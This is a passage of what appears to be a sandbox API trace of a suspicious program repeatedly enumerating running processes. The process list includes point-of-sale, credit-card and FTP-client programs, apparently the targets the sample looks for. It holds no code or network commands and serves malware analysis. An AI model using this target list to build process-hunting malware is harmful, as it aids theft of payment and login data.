cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0239.937] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0239.939] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0239.940] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0239.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0239.943] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0239.945] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0239.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0239.951] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0239.953] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0239.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0239.956] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0239.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0239.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0239.960] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0239.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0240.017] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0240.018] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0240.020] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0240.021] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0240.022] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0240.024] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.025] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.029] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.033] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0240.035] CloseHandle (hObject=0x1018) returned 1 [0240.035] Sleep (dwMilliseconds=0x64) [0240.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0240.154] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.156] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.157] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.159] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.160] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.161] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.163] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.164] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.165] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.167] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.171] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.172] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.173] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.174] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.176] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.177] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.178] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.180] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.181] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.202] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.203] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0240.205] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0240.206] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.207] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.209] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0240.210] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0240.211] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0240.213] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0240.217] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.219] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0240.220] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.222] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.223] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.224] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0240.226] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0240.227] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0240.228] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0240.230] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0240.236] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0240.238] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0240.240] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0240.243] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0240.244] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0240.297] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0240.299] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0240.301] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0240.303] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0240.304] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0240.306] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0240.312] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0240.314] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0240.316] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0240.317] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0240.319] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0240.321] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0240.327] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0240.329] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0240.331] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0240.333] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0240.335] Process32Next (in: 